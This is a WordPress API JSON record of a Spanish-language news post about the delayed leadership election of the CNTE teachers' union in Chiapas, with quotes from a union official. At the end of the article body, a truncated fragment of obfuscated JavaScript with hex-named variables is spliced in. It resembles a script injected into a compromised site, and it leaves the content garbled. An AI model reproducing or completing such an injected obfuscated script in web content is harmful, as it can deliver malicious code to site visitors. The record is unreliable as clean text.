{"id":5556,"date":"2022-10-03T00:29:56","date_gmt":"2022-10-03T00:29:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5556"},"modified":"2022-10-03T00:29:56","modified_gmt":"2022-10-03T00:29:56","slug":"relevo-sindical-en-la-cnte-debe-llevarse-a-cabo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5556","title":{"rendered":"Relevo sindical en la CNTE debe llevarse a cabo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"660\" height=\"350\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221002-WA0010.jpg\" alt=\"\" class=\"wp-image-5557\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221002-WA0010.jpg 660w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221002-WA0010-300x159.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221002-WA0010-310x165.jpg 310w\" sizes=\"auto, (max-width: 660px) 100vw, 660px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.2 de octubre del 2022. Tuxtla Guti\u00e9rrez.- Javier Saavedra Carrasco, integrante del Comit\u00e9 Ejecutivo Nacional de la Coordinadora Nacional de Trabajadores de la Educaci\u00f3n dio a conocer que todav\u00eda no se emite la convocatoria para la renovaci\u00f3n de la dirigencia sindical, sin embargo, este proceso no debe tener m\u00e1s demora. Detall\u00f3 que, desde octubre del 2021 tendr\u00eda que realizarse el relevo seccional de la Coordinadora Nacional de Trabajadores de la Educaci\u00f3n en Chiapas, sin embargo, la pandemia por Covid retras\u00f3 el proceso electivo del pr\u00f3ximo dirigente magisterial en esta entidad sure\u00f1a.Los maestros de la Coordinadora han realizado protestas para pedir que se emita a la brevedad la convocatoria, adem\u00e1s, han pedido que no haya intervenci\u00f3n gubernamental y sea un proceso independiente emanado de las bases magisteriales.De octubre de 2017 a la fecha, Pedro G\u00f3mez B\u00e1hamaca, ha estado al frente del magisterio en Chiapas, sin embargo, las \u00faltimas movilizaciones, ya no han sido encabezadas por el maestro de educaci\u00f3n primaria.Actualmente, se encuentra bajo pr\u00f3rroga la elecci\u00f3n del pr\u00f3ximo l\u00edder de la CNTE y aunque no hay una terna, los dos docentes que han alzado la mano para dirigir el destino de la Coordinadora son Javier Saavedra Carrasco, representante del Comit\u00e9 Ejecutivo Nacional y Manuel Mendoza V\u00e1zquez, docente de educaci\u00f3n ind\u00edgena de la zona altos, quien enfrent\u00f3 un proceso penal por distintos delitos y fue liberado a trav\u00e9s de protestas. \u201cEst\u00e1n arlag\u00e1ndolo para que se den las condiciones que permitan mediante descuentos, mediante represi\u00f3n, para que los compa\u00f1eros se dispersen y puedan tener una direcci\u00f3n a modo, para que los charros ganen el poder o nos roben\u201d, expres\u00f3 el representante del CEN.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores.2 de octubre del 2022. Tuxtla Guti\u00e9rrez.- Javier Saavedra Carrasco, integrante del Comit\u00e9 Ejecutivo Nacional de la Coordinadora Nacional de Trabajadores de la Educaci\u00f3n dio a conocer que todav\u00eda no se emite la convocatoria para la renovaci\u00f3n de la dirigencia sindical, sin embargo, este proceso no debe tener m\u00e1s demora. Detall\u00f3 que, desde octubre &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5557,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5556","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5556","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5556"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5556\/revisions"}],"predecessor-version":[{"id":5558,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5556\/revisions\/5558"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5557"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5556"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5556"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5556"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}